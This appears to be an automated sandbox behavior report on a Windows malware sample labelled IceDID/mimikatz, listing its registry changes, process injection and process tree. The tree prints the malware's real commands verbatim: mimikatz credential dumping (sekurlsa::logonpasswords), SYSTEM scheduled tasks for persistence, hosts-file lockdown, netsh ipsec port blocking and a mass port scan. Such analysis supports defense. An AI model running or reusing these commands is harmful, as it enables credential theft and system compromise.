\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2024-11-16_91e69467e6449f40d3b16eaecb505043_hacktools_icedid_mimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ngliteqrb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language snutqkl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nspfoo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2720 cmd.exe 1184 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x000a000000023b92-5.dat nsis_installer_2 behavioral2/files/0x000b000000023ba9-15.dat nsis_installer_1 behavioral2/files/0x000b000000023ba9-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 43 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iulpaulua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iulpaulua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iulpaulua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" snutqkl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iulpaulua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iulpaulua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iulpaulua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" snutqkl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iulpaulua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iulpaulua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iulpaulua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iulpaulua.exe Key created \REGISTRY\USER\.DEFAULT\Software iulpaulua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iulpaulua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iulpaulua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iulpaulua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ snutqkl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iulpaulua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iulpaulua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing snutqkl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iulpaulua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iulpaulua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iulpaulua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing iulpaulua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iulpaulua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iulpaulua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iulpaulua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals iulpaulua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iulpaulua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iulpaulua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iulpaulua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iulpaulua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iulpaulua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iulpaulua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iulpaulua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iulpaulua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iulpaulua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iulpaulua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iulpaulua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" snutqkl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" snutqkl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iulpaulua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iulpaulua.exe -
Modifies registry class 14 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" snutqkl.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1184 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3240 schtasks.exe 4252 schtasks.exe 3200 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 4640 2024-11-16_91e69467e6449f40d3b16eaecb505043_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 4640 2024-11-16_91e69467e6449f40d3b16eaecb505043_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 4076 snutqkl.exe Token: SeDebugPrivilege 3964 snutqkl.exe Token: SeDebugPrivilege 4392 vfshost.exe Token: SeDebugPrivilege 2188 iulpaulua.exe Token: SeLockMemoryPrivilege 3980 jtpawa.exe Token: SeLockMemoryPrivilege 3980 jtpawa.exe Token: SeDebugPrivilege 2544 iulpaulua.exe Token: SeDebugPrivilege 768 iulpaulua.exe Token: SeDebugPrivilege 4856 iulpaulua.exe Token: SeDebugPrivilege 4360 iulpaulua.exe Token: SeDebugPrivilege 2436 iulpaulua.exe Token: SeDebugPrivilege 4620 iulpaulua.exe Token: SeDebugPrivilege 4460 iulpaulua.exe Token: SeDebugPrivilege 2456 iulpaulua.exe Token: SeDebugPrivilege 4556 iulpaulua.exe Token: SeDebugPrivilege 5080 iulpaulua.exe Token: SeDebugPrivilege 3724 iulpaulua.exe Token: SeDebugPrivilege 3620 iulpaulua.exe Token: SeDebugPrivilege 3228 iulpaulua.exe Token: SeDebugPrivilege 2844 iulpaulua.exe Token: SeDebugPrivilege 3284 iulpaulua.exe Token: SeDebugPrivilege 2052 iulpaulua.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 4640 2024-11-16_91e69467e6449f40d3b16eaecb505043_hacktools_icedid_mimikatz.exe 4640 2024-11-16_91e69467e6449f40d3b16eaecb505043_hacktools_icedid_mimikatz.exe 4076 snutqkl.exe 4076 snutqkl.exe 3964 snutqkl.exe 3964 snutqkl.exe 2528 xohudmc.exe 4844 nspfoo.exe 512 snutqkl.exe 512 snutqkl.exe 6092 snutqkl.exe 6092 snutqkl.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4640 wrote to memory of 2720 4640 2024-11-16_91e69467e6449f40d3b16eaecb505043_hacktools_icedid_mimikatz.exe 83 PID 4640 wrote to memory of 2720 4640 2024-11-16_91e69467e6449f40d3b16eaecb505043_hacktools_icedid_mimikatz.exe 83 PID 4640 wrote to memory of 2720 4640 2024-11-16_91e69467e6449f40d3b16eaecb505043_hacktools_icedid_mimikatz.exe 83 PID 2720 wrote to memory of 1184 2720 cmd.exe 87 PID 2720 wrote to memory of 1184 2720 cmd.exe 87 PID 2720 wrote to memory of 1184 2720 cmd.exe 87 PID 2720 wrote to memory of 4076 2720 cmd.exe 95 PID 2720 wrote to memory of 4076 2720 cmd.exe 95 PID 2720 wrote to memory of 4076 2720 cmd.exe 95 PID 3964 wrote to memory of 1300 3964 snutqkl.exe 97 PID 3964 wrote to memory of 1300 3964 snutqkl.exe 97 PID 3964 wrote to memory of 1300 3964 snutqkl.exe 97 PID 1300 wrote to memory of 4548 1300 cmd.exe 99 PID 1300 wrote to memory of 4548 1300 cmd.exe 99 PID 1300 wrote to memory of 4548 1300 cmd.exe 99 PID 1300 wrote to memory of 1804 1300 cmd.exe 100 PID 1300 wrote to memory of 1804 1300 cmd.exe 100 PID 1300 wrote to memory of 1804 1300 cmd.exe 100 PID 1300 wrote to memory of 976 1300 cmd.exe 103 PID 1300 wrote to memory of 976 1300 cmd.exe 103 PID 1300 wrote to memory of 976 1300 cmd.exe 103 PID 1300 wrote to memory of 60 1300 cmd.exe 104 PID 1300 wrote to memory of 60 1300 cmd.exe 104 PID 1300 wrote to memory of 60 1300 cmd.exe 104 PID 1300 wrote to memory of 3488 1300 cmd.exe 106 PID 1300 wrote to memory of 3488 1300 cmd.exe 106 PID 1300 wrote to memory of 3488 1300 cmd.exe 106 PID 1300 wrote to memory of 4504 1300 cmd.exe 107 PID 1300 wrote to memory of 4504 1300 cmd.exe 107 PID 1300 wrote to memory of 4504 1300 cmd.exe 107 PID 3964 wrote to memory of 2044 3964 snutqkl.exe 112 PID 3964 wrote to memory of 2044 3964 snutqkl.exe 112 PID 3964 wrote to memory of 2044 3964 snutqkl.exe 112 PID 3964 wrote to memory of 4640 3964 snutqkl.exe 114 PID 3964 wrote to memory of 4640 3964 snutqkl.exe 114 PID 3964 wrote to memory of 4640 3964 snutqkl.exe 114 PID 3964 wrote to memory of 1264 3964 snutqkl.exe 116 PID 3964 wrote to memory of 1264 3964 snutqkl.exe 116 PID 3964 wrote to memory of 1264 3964 snutqkl.exe 116 PID 3964 wrote to memory of 3396 3964 snutqkl.exe 121 PID 3964 wrote to memory of 3396 3964 snutqkl.exe 121 PID 3964 wrote to memory of 3396 3964 snutqkl.exe 121 PID 3396 wrote to memory of 1540 3396 cmd.exe 123 PID 3396 wrote to memory of 1540 3396 cmd.exe 123 PID 3396 wrote to memory of 1540 3396 cmd.exe 123 PID 1540 wrote to memory of 4332 1540 wpcap.exe 124 PID 1540 wrote to memory of 4332 1540 wpcap.exe 124 PID 1540 wrote to memory of 4332 1540 wpcap.exe 124 PID 4332 wrote to memory of 840 4332 net.exe 126 PID 4332 wrote to memory of 840 4332 net.exe 126 PID 4332 wrote to memory of 840 4332 net.exe 126 PID 1540 wrote to memory of 532 1540 wpcap.exe 127 PID 1540 wrote to memory of 532 1540 wpcap.exe 127 PID 1540 wrote to memory of 532 1540 wpcap.exe 127 PID 532 wrote to memory of 2324 532 net.exe 129 PID 532 wrote to memory of 2324 532 net.exe 129 PID 532 wrote to memory of 2324 532 net.exe 129 PID 1540 wrote to memory of 3128 1540 wpcap.exe 130 PID 1540 wrote to memory of 3128 1540 wpcap.exe 130 PID 1540 wrote to memory of 3128 1540 wpcap.exe 130 PID 3128 wrote to memory of 3876 3128 net.exe 132 PID 3128 wrote to memory of 3876 3128 net.exe 132 PID 3128 wrote to memory of 3876 3128 net.exe 132 PID 1540 wrote to memory of 1804 1540 wpcap.exe 133
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2132
-
C:\Windows\TEMP\letltzgie\jtpawa.exe"C:\Windows\TEMP\letltzgie\jtpawa.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3980
-
-
C:\Users\Admin\AppData\Local\Temp\2024-11-16_91e69467e6449f40d3b16eaecb505043_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-11-16_91e69467e6449f40d3b16eaecb505043_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4640 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\fpibtvet\snutqkl.exe2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2720 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1184
-
-
C:\Windows\fpibtvet\snutqkl.exeC:\Windows\fpibtvet\snutqkl.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4076
-
-
-
C:\Windows\fpibtvet\snutqkl.exeC:\Windows\fpibtvet\snutqkl.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3964 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1300 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4548
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:1804
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:976
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:60
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3488
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:4504
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2044
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4640
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1264
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\mtemsclch\taatftcev\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3396 -
C:\Windows\mtemsclch\taatftcev\wpcap.exeC:\Windows\mtemsclch\taatftcev\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1540 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:4332 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:840
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:532 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
PID:2324
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
PID:3128 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
PID:3876
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
PID:1804 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
PID:5028
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:4504 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:1180 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:3212
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:3928 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:4212 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:388
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\mtemsclch\taatftcev\vltbbrlit.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\mtemsclch\taatftcev\Scant.txt2⤵PID:1552
-
C:\Windows\mtemsclch\taatftcev\vltbbrlit.exeC:\Windows\mtemsclch\taatftcev\vltbbrlit.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\mtemsclch\taatftcev\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:556
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\mtemsclch\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\mtemsclch\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:2172 -
C:\Windows\mtemsclch\Corporate\vfshost.exeC:\Windows\mtemsclch\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4392
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "dpibnnvii" /ru system /tr "cmd /c C:\Windows\ime\snutqkl.exe"2⤵
- System Location Discovery: System Language Discovery
PID:748 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:5016
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "dpibnnvii" /ru system /tr "cmd /c C:\Windows\ime\snutqkl.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4252
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "tvvutmlay" /ru system /tr "cmd /c echo Y|cacls C:\Windows\fpibtvet\snutqkl.exe /p everyone:F"2⤵PID:1264
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3312
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "tvvutmlay" /ru system /tr "cmd /c echo Y|cacls C:\Windows\fpibtvet\snutqkl.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3240
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "zbalbiqht" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\letltzgie\jtpawa.exe /p everyone:F"2⤵PID:3792
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3624
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "zbalbiqht" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\letltzgie\jtpawa.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3200
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1584
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1120
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2976
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2992
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3336
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1996
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4608
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3396
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1180
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2236
-
-
